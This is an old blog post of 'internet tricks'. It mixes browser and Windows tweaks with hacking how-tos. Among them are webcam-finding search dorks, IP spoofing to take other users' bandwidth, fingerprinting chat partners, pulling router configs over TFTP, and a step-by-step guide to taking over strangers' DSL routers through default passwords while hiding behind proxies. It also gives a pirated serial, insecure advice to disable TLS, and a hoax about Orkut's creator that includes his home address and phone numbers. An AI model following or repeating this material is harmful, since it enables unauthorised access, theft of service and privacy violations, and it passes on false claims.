Monday, May 5, 2008

Great Internert Tricks

1.Speed Up Network Browsing

When you use My Network Places to browse for other machines on your network, it usually takes a long time to display the list of shared resources for the target machine. This is because Windows XP first checks for the scheduled tasks on the target machine before listing the shared resources present on the computer.

To schedule a task using Windows XP’s Scheduled Tasks, choose Start –>Programs –> Accessories–> System Tools–> Scheduled Tasks.

This unnecessary checking can easily add 30 seconds of delay. You can decrease the time browsing takes by modifying the Registry to turn off this checking:

Invoke the Registry Editor by typing regedit at the command line or in run window.
Open the Registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\

Remote Computer\NameSpaceDelete the following key (the value for it is the Scheduled Tasks)
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}Close the Registry and reboot


2.HACK A WEBCAM

first go to Google search website through www.google.co.in and then in the search box type:

inurl:/view/index.shtml and press enter

then you will get list on web cameras working on net,,,

note:: if u type the ip address of the computer in place of inurl then the web camera of that computer can be hacked

example:: you can type in google search as

207.111.165.30/view/index.shtml to view webcamera used at that ip address

the other google search links which makes web cameras publicly viewable are:

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”


3.Great Tip For Mp3 Searching On Google

Go to google copy and paste in

?intitle:index.of? mp3
and after mp3 put in an artist or album or whatever and hit enter… what you get is lists of downloadable mp3s

eg:
?intitle:index.of? mp3 atif

enjoy downloading…………


4.CHAT YOUR FRIENDS THROUGH MS-DOS

1. All you need is your friends IP address and your Command Prompt.
2. Open your notepad and write tis code as it is……………… I would prefer you to copy this !

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3. Now save this as "Messenger.Bat".
4. Drag this file (.bat file)over to Command Prompt and press enter!
5. You would then see some thing like this:
MESSENGER
User:

6. After "User" type the IP address of the computer you want to contact.

7. Before you press "Enter" it should look like this:

MESSENGER
User: IP_Address
Message: Hi, How are you ?

8. Now all you need to do is press "Enter", and start chatting Now all you need to do is press Enter, and start chatting.....
Comment if u liked it.. :)

5.Speed increase for Cable Beam

Question: If ur using cable beam and how to increase speed something. Am i right
Answer:
Hack Sify,Reliance,Others] Speed Upto 10 MBPS
..:~Description~:..

First Download this ETHERNET Ip Sniffer called ETHERDETECT
Use the tool to Scan Ip' network
Keep Scanning till you get some 200 Ip's ..
Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!NOTE:Please save your Ip address somewhere so as to get back to your original ip !
It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.
Sometimes when you will change your Ip you will get same speed ...in that case ..try another IP !

.:~Download Link~:..

http://rapidshare.com/files/46070425/EtherDetect_setup.exe

..:~SERIAL~:..
YW38X6HKWYT4CTK

Credits: Rinse John

Gautam Agarwal5 comments

6.Google Search Techniques

Link: url Shows other pages with links to that url

Related:url same as "what's related" on serps.

Site: domain restricts search results to the given domain.

Allinurl: shows only pages with all terms in the url.

Inurl: like allinurl, but only for the next query word.

Allintitle: shows only results with terms in title.

Intitle: similar to allintitle, but only for the next word.

"intitle:webmasterworld google" finds only pages with Webmasterworld in the title, and google anywhere on the page

Cache:url will show the Google version of the passed url.

Info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.

Spell: will spell check your query and search for it.

Stocks: will lookup the search query in a stock index.

Filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.

Daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.

Maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.

Phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for Something that looks like an address (include a name and zip code)

Site:www.somesite.net "+www.somesite.+net"(tells you how many pages of your site are indexed by google)

Allintext: searches only within text of pages, but not in the links or page title

Allinlinks: searches only within links, not text or title

8.Increase the Browsing and Downloading speed in Windows Vista

With windows Vista you have noticed the slow internet speed. The web browsing and downloading speed is very slow as compare to previous versions of windows. You can open the same sites in windows XP and server 2003 with the normal speed.

Follow the given steps to increase the Vista browsing speed:

First go to Advance tab in Internet Explorer properties and turn off the TLS (Transport Layer Security) encryption option.

Here to fix problem with some secure pages turn on the SSL 2.0 (Secure Sockets Layer) feature and click Ok button to close it.


In windows Vista, the TCP autotuning feature is enabled by default. Some web servers do not respond properly to this feature, so it appears that some sites open with very slow speed.

To use this feature, you will need to be logged into your computer with administrative rights.

First click on Start button and type CMD in Run option then press Enter.

At Command Prompt, type the following command and press enter.netsh interface tcp set global autotuninglevel= disabled

This command will disable the TCP autotuning feature. Now close the command Prompt and restart your computer after any changes to go into effect.

You can easily restore these setting by typing the following command at Command Prompt.netsh interface tcp set global autotuninglevel= normal

Now close the command Prompt and again restart your computer after any changes to go into effect.


9.How to remove trojan.w32.looksky {removal instructions}

Trojan.w32.looksky is another name for the Smitfraud/zlob trojan. SmitFraudFix removes trojan.w32.looksky, but you should also check your system for other malware, and use ATF cleaner to clean your temp files when finished.

Instructions to remove Trojan.w32.looksky using SmitFraudFix

SmitFraudFix only works with Windows XP or 2000

Download SmitfraudFix:Use this URL to download the latest version (the file contains both English and French versions):http://siri.geekstogo.com/SmitfraudFix.exe

Use:

* Search:
o Double-click SmitfraudFix.exe
o Select 1 and hit Enter to create a report of the infected files. The report can be found at the root of the system drive, usually at C:\rapport.txt

Clean:
* Reboot your computer in Safe Mode (before the Windows icon appears, tap the F8 key continually)
* Double-click SmitfraudFix.exe
* Select 2 and hit Enter to delete infect files.
* You will be prompted: Do you want to clean the registry ? answer Y (yes) and hit Enter in order to remove the Desktop background and clean registry keys associated with the infection.
* The tool will now check if wininet.dll is infected. You may be prompted to replace the infected file (if found): Replace infected file ? answer Y (yes) and hit Enter to restore a clean file.
* A reboot may be needed to finish the cleaning process. The report can be found at the root of the system drive, usually at C:\rapport.txt

* Optional:
o To restore Trusted and Restricted site zone, select 3 and hit Enter.
o You will be prompted: Restore Trusted Zone ? answer Y (yes) and hit Enter to delete trusted zone.


Note:

process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool". It is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
Here: http://www.beyondlogic.org/consulting/processutil/processutil.htm

10.Change Yahoo! Messenger Title Bar

Change Yahoo! messenger title bar

Hey guys you can change the yahoo messenger title bar...
For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". Open it in "notepad".
In this file just go to the end and write the following code:

[APP TITLE]
CAPTION=Gautam's Messenger

Here you can write any name in place of "Gautam's Messenger"... then see the fun.... You can have your own name being placed in yahoo messenger title bar.

12.New Airtel Live! Free Trick (All India)

New Airtel Live! free trick (All India)

Just go to

http://www.google.co.in/gwt/n

through Airtel Live!. Then type the address there. You can open any site from there for free !

Note- Surfing through Airtel Live! must be free in your state.

13.Use Microsoft Calculator to surf Internet

How to access the internet via your standard Microsoft Calculator?

When your browser(s) is/are messed up for some unexplainable reason*
1. Open your MS Calculator. This is normally found in Start => All Programs => Accessories => Calculator.
2. Open the help-window by pressing the F1 key.
3. Click the top-left corner icon of the help window once (Standard is a Document with a yellow Questionmark).
4. Select Jump to URL...
5. Type your address into the avaliable field, but remember to type http://, and not just www. (or equivalent).
6. Have fun!

14.The 10 Minute Email Address

Welcome to 10 Minute Mail.

By clicking on the link below, you will be given a temporary e-mail address. Any e-mails sent to that address will show up automatically on the web page. You can read them, click on links, and even reply to them. The e-mail address will expire after 10 minutes.

Why would you use this? Maybe you want to sign up for a site which requires that you provide an e-mail address to send a validation e-mail to. And maybe you don't want to give up your real e-mail address and end up on a bunch of spam lists. This is nice and disposable. And it's free. Enjoy!

PS: You can also get an extension on the 10 minutes if you haven't gotten the email you expected yet. It renews in increments of 10 minutes...

This is very handy and useful guys.

Click Here

Comment if you like this.....


15.Orkut Buyukkokten (The Creator of Orkut)

His Earnings:-

1) Orkut Buyukkokten(the creator of Orkut) gets $12 when every person registers to this website.

2) He also gets $10 when you add somebody as a friend.

3) He gets $8 when your friend's friend adds you as a friend & gets $6 if anybody adds you as a friend in the resulting chain.

4) He gets $5 when you scrap somebody & $4 when somebody scraps you.

5) He also gets $200 for each photograph you upload on Orkut.

6) He gets $2.5 when you add your friend in the crush-list or in the hot-list.

7) He gets $2 when you become somebody's fan.

8) He gets $1.5 when somebody else becomes your fan.

9) He even gets $1 every time you logout of Orkut.

10) He gets $0.5 every time you just change your profile-photograph.

11) He also gets $0.5 every time you read your friend's scrap-book & $0.5 every time you view your friend's friend-list.

12) Many Global Financial Consultants think this person might become the richest-person in the world soon in a few yrs.

Email: orkut@stanford.edu

Home: 2250 Latham Street Apt. #57 Mountain View, CA 94040

Number: (650) 988 0339

Office: Room 430, Gates Building Office

Number: (650) 723-6805

Cell: (650) 888-5822

15.Use Google as proxy

Many jobs and schools & colleges block access to certain sites. However, it is very difficult for anybody to block access to google. By using google with either of these two methods, you can gain access to blocked sites very easily.

Blocked web site, huh? Need a proxy?

I am not a big fan of chasing free, open proxies all over the place. I use google instead. Here I describe what I believe is an uncommon way for bypassing blocked sites using google.

1) The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the "cached" link that appears on google. Easy, simple, and frequently works for static information.

2) Passing the site through google translator works well as well. Here's the URL to use:

Code:

http://www.google.com/translate?langpair=enen&u=www.blockedsite.com

(where blockedsite.com is the site that you wish to visit)

This translates the site from english to english and works because the ip address will appear as google instead of you. Here's a link to tech-recipes passed through the translator as an example. You can actually do this with any langpair. Change enen in the URL above to spanish by using eses and it still works.

3) Unique method that I have not seen described before is to search through google mobile. Google mobile will "convert as you go" very similiar to the translation method above.

Just search for your site with google mobile and click on the link it provides. Here's is tech-recipes brought up through google mobile search. Once again, this will allow you to bypass any blocks because the IP request comes from google not for you.

Like the translation method above, google will continue to "proxy" as you continue to visit links through the site. And ya it is also useful to retrive some information from net which is currently not available.


16.Hack PC while Chatting

I am not sure that this will work 100%.

But yes will work almost 70 percent of the times.

But before that you need to know some few things of yahoo chat protocol...

Following are the features : -

1) When we chat on yahoo every thing goes through the server. Only when we chat thats messages.

2) When we send files yahoo has two options-

a) Either it uploads the file and then the other client has to download it.
b) Either it connects to the client directly and gets the files.

3) When we use video or audio:-
a) It either goes through the server
Or it has client to client connection

And when we have client to client connection the opponents IP is revealed. On the 5051 port. So how do we exploit the Chat user when he gets a direct connection. And how do we go about it. Remember I am here to hack a system without using a TOOL only by simple net commands and yahoo chat techniques. Thats what makes a difference between a real hacker and newbees.

So lets analyse

1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50% chances of getting a IP address when you send files
3) Again 50% chances of getting IP when you use video or audio.

So why to wait lets exploit those 50% chances .

I'll explain only for files here which lies same for Video or audio

1) Go to dos
type ->
netstat -n 3

You will get the following output. Just do not care and be cool...

Active Connections

Proto Local Address Foreign Address State

TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State

TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target.

If the files comes from server, thats the file is uploaded leave it. You will not get the ip.
But if a direct connection is established
hmmmmmm then the first attacker first phase is over

This is the output in your netstat. The 5101 number port is where the Attacker is connected.

Active Connections

Proto Local Address Foreign Address State


TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

3) so what next???

Hmmm........ Ok so make a DOS attack now
Go to dos prompt and Just do

nbtstat -A Attackers IPaddress.

Can happen that if system is not protected then you can see the whole network.

C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

What to do next??

It is now your job to tell me what you have done next...

So the conclusion is- never exchange files, video or audio till you know that the user with whom you are chatting is not going to harm you.

17.By-Pass Firewalls

How can you hack a Firewall?

Well, there is a useful tool called Trivial FTP (TFTP) which can be used by a attacker to hack firewalls.

How does it work?

While scanning UDP ports, you will want to pay close attention to systems with port 69 open. Cicso routers allow the use of TFTP in conjunction with network servers to read and write configuration files. The configuration files are updated whenever a router configuration is changed. If you can identify TFTP, there is a good chance that you can access the configuration file and download it.

Here are the basic steps:-

(1) Determine the router’s name. NSLookup or Ping –a can be useful.

c: \>ping -a 192.168.13.1

Pinging Router1 [192.168.13.1] with 32 bytes of data:

Reply from 192.168.13.1: bytes=32 time<10ms ttl="">

Reply from 192.168.13.1: bytes=32 time<10ms ttl="">

Reply from 192.168.13.1: bytes=32 time<10ms ttl="">

Reply from 192.168.13.1: bytes=32 time<10ms ttl="">

Ping statistics for 192.168.13.1:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

(2) After the router’s name is known, you can then use TFTP to download it from the TFTP server.

c:\>tftp -I 192.168.13.1 GET router1.cfg

Transfer successful: 250 bytes in 1 second, 250 bytes/s

(3) If you are lucky, you will be rewarded with the router’s configuration file.

18.Browser Hijacking

Hackers and Browser Hijacking is one area of the Net that affects everyone at some stage.

In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers.

Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point.

1. Clearing the Page File at Shutdown:

Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file.

In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1.

Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (! Gig or more) may take a minute or two longer.

2. Disable the POSIX and OS/2 Subsystem:

Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings.

To disable these subsystems, open the registry and navigate to HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession ManagerSubSystems. Delete the subkeys Os2 and Posix. Then reboot.

3. Never leave default passwords blank:

On installation, Windows 2000 sets up an Administrator account with total system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.

4. Install Windows In a different directory:

Windows usually installs itself in the WINDOWS directory. Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you install Windows to another folder but they are very few and they are far between.

5. Fake out hackers with a dummy Administrator account:

Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers.

Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.

You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the Account is disabled box and click OK.

Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such software. The original Administrator account is configured with a security ID that must continue to be present in the system.

6. Disable the Guest account:

Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.

7. Set the Hosts file to read-only to prevent name hijacking.

This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably.

Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably.

To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.

8. Disallow changes to IE settings through IE:

This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel.

Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting.

You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1.

9. Turn off unneeded Services:

Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.

A good resource and instruction on which of these services can be disabled go to /http://www.blkviper.com/WinXP/

10. Disable simple File Shares:

In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it’s a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home)


19.Secret Backdoor To Many Websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Voila! You're done!

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


20.Hacking DSL Router

This tutorial will explain to you how to hack someone's internet account through his router. This hack is based on a security exploit of the router's default password and the stupidity of the user.
Explanation: When somebody buy's a xDSL/Cable router, the router is set to factory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit. Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both. This is what we are looking for.

Step 1.

Get a multiple IP range scanner like "angry IP scanner".

Get your IP address from here:

http://http://www.cmyip.com/

Get a xDSL/Cabel user IP range. This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.27.xxx most likely it will be from 212.129.27.1 to 212.129.27.255 . To keep your scanning range not to big it's smart to scan from 212.129.27.1 to 212.129.27.255 it also depends of your bandwidth how fast the scan will be finished. The IP address above is just a example any IP range from a xDSL/Cable provider can be used for this hack. Before you start scanning specify the TCP/IP ports, you know that we are looking for TCP port 23 (telnet) and TCP port 80 (http), so edit the list and select only port 23 and port 80. Now start scanning and wait for the results. When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.

Step 2.
Way 1

This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9kbps modem for example) when connection to the victim's router. Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down "telnet" without ", click OK. Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK. Wait for your computer to make a connection. This way only works when the router has a open telnet port service running.

Way 2

This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9kbps modem for example) when connection to the victim's router. Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar. This way only works when the router has a open hyper text transfer protocol (http) service running.

Step 3

Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable. So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. When you find out the type of router that's been used get the wright loginname and password from this list (get it here. not every router is on the list)Default router password list.

Step 4

When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user. Go to this option and open it. Most likely you will see a overview of user setup options. Now look for the username and password. In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.

Alternate to step 4:
Download Show password or something like this...

Tips.

Beware on most routers only one person can be logged on simultaneous in the router setup menu. Don't change anything in the router if you don't know what you are doing.

Note: You can skip step 2 if you wish, but I am not responsible if anything goes wrong with you...

21.Speed up your Firefox

Speed up your firefox browser and load pages 2-3 times faster than previous, its tested

1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.


2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.


If you're using a broadband connection you'll load pages 2-3 times faster now.

mozilla net speed increases.... cheers

No comments: